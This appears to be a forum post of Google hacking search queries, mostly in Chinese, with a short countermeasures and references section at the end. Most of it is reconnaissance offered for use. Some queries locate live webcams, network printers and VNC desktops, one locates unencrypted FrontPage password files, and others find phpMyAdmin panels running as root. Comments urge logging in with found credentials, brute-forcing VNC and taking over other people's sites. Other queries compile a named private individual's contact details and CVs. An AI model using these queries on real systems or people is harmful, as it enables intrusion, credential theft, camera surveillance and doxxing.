"robots.txt" "User-agent" ext:txt
"this document is private | confidential(机密的) | secret" ext:doc | ext:pdf | ext:xls
intitle:"index of" "jpg | png | bmp" inurl"personal | inurl:private
4.在线网络摄像头
intitle:"live View/ -AXIS" | inurl:view/view.shtml
inurl:"ViewFrame?Mode="
inurl:"MultiCameraFrame?Mode="
inturl:"axis-cgi/mjpg"
intext:"MOBOTIX M1"
intext:"Open Menu"
inurl:"view/index.shtml"
[url]www.undertree.us/allcams.html[/url]
Google Video
supergirl duration:(short | medium | long) is:free
在线设备
inurl:"hp/device/this.LCDispatcher"
intitle:liveapplet inurl:LvAppl
"Please wait ....." intitle:"SWW link"
敏感信息
(那些通常公众于世但它的透露可能会给当事人带来麻烦的信息)
Data which is normally public but whose reveal may disturb its owner
1.位于讨论会,邮局等场所
inurl:"search.php?search_author=thomas"
inurl:pipermail "thomas fischer"
2.敏感的目录
intitle:"index of" inurl:"backup"
3.Web 2.0
"thomas fischer" site:blogspot.com
"thomas" site:flickr.com
"thomas" site:youtube.com
鉴定资料
1.描述标识私人的信息
姓名,地址,电话,电话分机
allintext: name email phone address intext:"thomas fischer(人物)" ext:pdf
Twiki inurl:"View/Main" "thomas fischer"
个人简历
intitle:CV OR intitle:Lebenslauf "thomas fischer"
intitle:CV OR intitle:Lebenslauf ext:pdf OR ext:doc
2 用户姓名
intitle:"usage Statistics(统计表) for" intext:"Total Unique Usernames"
Examples Of Google Hacking 1
不可靠程序透露的信息
"php version" intitle:phpinfo inurl:info.php
程序中含有SQL注入漏洞并且路径可以修改弱口
"advanced guestbook * powered" inurl:addentry.php
intitle:"View img" inurl:viewimg.php
安全扫描报告
"Assessment report" "nessus" filetype:pdf
数据库程序和错误文件
"Welcome to phpmyadmin ***" "running on * as root@*" intitle:phpmyadmin
"mysql error with query"
============================================================================
countermeasure(对策)
Use automatic tools to check your system(e.g. gooscan,sitedigger,goolink)
Install and manage Google Honeypot
sitedigger
free from FoundStone Company
support Both GHD and foundstone's own hacking database
for a given host,all etries in the database are queried
===================================================
References
google hacking database
[url]http://johnny.ihackstuff.com[/url]
google hack honeypot project
[url]http://ghh.sourceforge.net[/url]
goolink -security scanner
[url]www.ghacks.net/2005/11/23/goolink-scanner-beta-preview/[/url]
siteDigger c2.0 -information Gathering Tool
[url]http://www.foundstone.com[/url]
FileSearching
[url]www.filesearching.com[/url]
gooscan-google security scanner
[url]http://johnny.ihackstuff.com[/url]
=====================================================
Please use this information for no other reason
Online Cameras
inurl:"viewrframe?mode=motion"(Requires ActiveX)
intitle:"snc-rz30 home" (requires activeX)
intitle:"WJ-NT104 Main"
inurl:LvApp1 intilte:liveapplet(great pan and zoom)
intitle:"Live Vew / -AXIS"
inurl:indexFrame.shtml "Axis Video Server"
查看从Google中注销的网站
思路:找到记载这些网站的robots.txt进行筛选
"robots.txt" "disallow:" filetype:txt
Front Page user logins
使用此字符串进行搜索,你可以获取很多登陆密码和账户,搜索到的的这些文件中密码和账户都未进行过加密
inurl:_vti_pvt "service.pwd"
Php Photo Albums
此搜索算法允许你察看PHP用户上传倻面相册,并且你可以上传你自己的照片到里面
inurl:"phphotoabum/upload"
VNC User info
通过虚拟机绕过密码验证使用VNc Brute强行破解密码需求这一验证强行的登陆别人的电脑
"vnc desktop" inurl:5800
Network Printers
察看公网的共享打印机,你可以查看他们的状态,设置 ,你还可以用他们中的一些来打印自己的东西
inurl:"port_255" -htm
php Administrator Access
PHPMyAdmin是用户操控网站数据库的一个账户,你可以用它来访问那些安全系数比较低的网站,通过这个账户你可以操控他们的网站
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" running on * as root@*"
页:
[1]